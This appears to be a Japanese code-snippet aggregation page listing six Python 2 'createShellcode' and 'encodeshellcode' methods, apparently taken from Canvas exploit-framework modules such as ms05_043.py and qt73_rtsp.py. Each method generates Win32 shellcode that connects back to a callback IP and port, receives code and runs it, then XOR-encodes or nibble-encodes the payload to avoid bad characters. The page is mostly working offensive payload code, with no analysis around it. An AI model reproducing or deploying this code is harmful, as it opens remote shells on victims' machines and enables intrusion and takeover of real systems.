コード例 #1
0
 def createShellcode(self):
     import shellcode.shellcodeGenerator as shellcodeGenerator
     sc = shellcodeGenerator.win32()
     sc.addAttr('findeipnoesp', {'subespval': 3000})
     sc.addAttr('revert_to_self_before_importing_ws2_32', None)
     sc.addAttr('tcpconnect', {
         'port': self.callback.port,
         'ipaddress': self.callback.ip
     })
     sc.addAttr('CreateThreadRecvExecWin32',
                {'socketreg': 'FDSPOT'})  #MOSDEF
     sc.addAttr('ExitThread', None)
     rawshellcode = sc.get()
     import encoder.xorencoder as xorencoder
     encoder = xorencoder.simpleXOR()
     encoder.setbadstring(self.badstring)
     ret = encoder.find_key(rawshellcode)
     if ret == 0:
         self.log('Could not find a key for this shellcode!')
         raise Exception, 'No shellcode generated'
     self.shellcode = encoder.encode(rawshellcode)
     if self.shellcode == '':
         raise Exception, 'No shellcode generated'
     self.log('Xor key used: %x' % (encoder.getkey()))
     self.log('Length of shellcode=%s' % (len(self.shellcode)))
     return self.shellcode
コード例 #2
0
ファイル: installshield.py プロジェクト: zu1kbackup/Canvas
    def createShellcode(self):
        sc=shellcodeGenerator.win32()                                                                                        
        sc.addAttr("findeipnoesp",{"subespval": self.subesp}) #don't mess with eip
        sc.addAttr("revert_to_self_before_importing_ws2_32", None)
        sc.addAttr("tcpconnect",{"port":self.callback.port,"ipaddress":self.callback.ip})                                                              
        sc.addAttr("CreateThreadRecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF
        sc.addAttr("ExitThread",None)

        rawshellcode=sc.get()
        
        print "[!] RAW Shellcode len: %d bytes" % len(rawshellcode)
        
        #first encode to nibble
        enc = nibble_encoder.intel_nibbleencoder()
        bad = ""
        for i in range(ord('A'),ord('Z')+1):
            #for a-z inclusive, these are badchars
            bad+=chr(i)
        enc.setbadstring(bad)
        rawshellcode = enc.encode(rawshellcode)
        
        print "[!] Nibble Encoded Shellcode len: %d bytes" % len(rawshellcode)
        
        #then do a xor enconding using the real badstring
        encoder = xorencoder.simpleXOR()
        encoder.setbadstring(self.badstring)
        encoder.find_key(rawshellcode)
        self.shellcode = encoder.encode(rawshellcode)
                
        print "[!] Shellcode len: %d bytes" % len(self.shellcode)
        
        if not len(self.shellcode):
            return None

        return self.shellcode
コード例 #3
0
ファイル: qt73_rtsp.py プロジェクト: y360u/canvas
    def createShellcode(self):
        sc = shellcodeGenerator.win32()
        sc.addAttr("findeipnoesp",
                   {"subespval": self.subesp})  #don't mess with eip
        sc.addAttr("revert_to_self_before_importing_ws2_32", None)
        sc.addAttr("tcpconnect", {
            "port": self.callback.port,
            "ipaddress": self.callback.ip
        })
        sc.addAttr("CreateThreadRecvExecWin32",
                   {"socketreg": "FDSPOT"})  #MOSDEF
        sc.addAttr("TerminateThread", None)

        rawshellcode = sc.get()

        print "[!] RAW Shellcode len: %d bytes" % len(rawshellcode)

        #then do a xor enconding using the real badstring
        encoder = xorencoder.simpleXOR()
        encoder.setbadstring(self.badstring)
        encoder.find_key(rawshellcode)
        self.shellcode = encoder.encode(rawshellcode)

        print "[!] Shellcode len: %d bytes" % len(self.shellcode)

        if not len(self.shellcode):
            return None

        return self.shellcode
コード例 #4
0
ファイル: hanword_exec.py プロジェクト: y360u/canvas
    def createShellcode(self):
        self.createWin32ClientSideShellcode()

        encoder = simpleXOR(key=0x3a)
        encoder.setbadstring(self.badstring)
        #self.shellcode = "\xcc" + encoder.encode(self.shellcode) + "\xcc"
        self.shellcode = encoder.encode(self.shellcode)
コード例 #5
0
 def encodeshellcode(self, rawshellcode):
     from encoder import xorencoder
     encoder = xorencoder.simpleXOR()
     encoder.setbadstring(self.badstring)
     ret = encoder.find_key(rawshellcode)
     if ret == 0:
         self.log('Could not find a key for this shellcode!')
         raise Exception, 'No shellcode generated'
     self.shellcode = encoder.encode(rawshellcode)
     if self.shellcode == '':
         raise Exception, 'No shellcode generated'
     self.log('Xor key used: %x' % (encoder.getkey()))
     self.log('Length of shellcode=%d' % (len(self.shellcode)))
     print repr(self.shellcode[:16])
     return self.shellcode
コード例 #6
0
ファイル: ms05_043.py プロジェクト: zu1kbackup/Canvas
 def createShellcode(self):
     #self.log('Creating shellcode to callback to %s:%s'%(self.callback.ip,self.callback.port))
     #self.shellcode=self.createHeapSafeInjectIntoProcess(self.badstring,self.callback.ip,self.callback.port,smallcode=1,processname='LSASS.EXE',backupprocess='lsass.exe')
     sc=shellcodeGenerator.win32()
     sc.addAttr('findeipnoesp',None)
     sc.addAttr('Fix RtlEnterCriticalSection',{'SimpleFix':1})
     sc.addAttr('tcpconnect',{'port':self.callback.port,'ipaddress':self.callback.ip})
     sc.addAttr('SmallRecvExecWin32',{'socketreg':'FDSPOT'}) #MOSDEF
     rawshellcode=sc.get()
     encoder=xorencoder.simpleXOR()
     encoder.setbadstring(self.badstring)
     ret=encoder.find_key(rawshellcode)
     if ret==0:
         self.log('Could not find a key for this shellcode!')
         raise Exception,'No shellcode generated'
     self.shellcode=encoder.encode(rawshellcode)
     if self.shellcode=='':
         raise Exception,'No shellcode generated'
     self.log('Xor key used: %x'%(encoder.getkey()))
     self.log('Length of shellcode: %d'%(len(self.shellcode)))
     return self.shellcode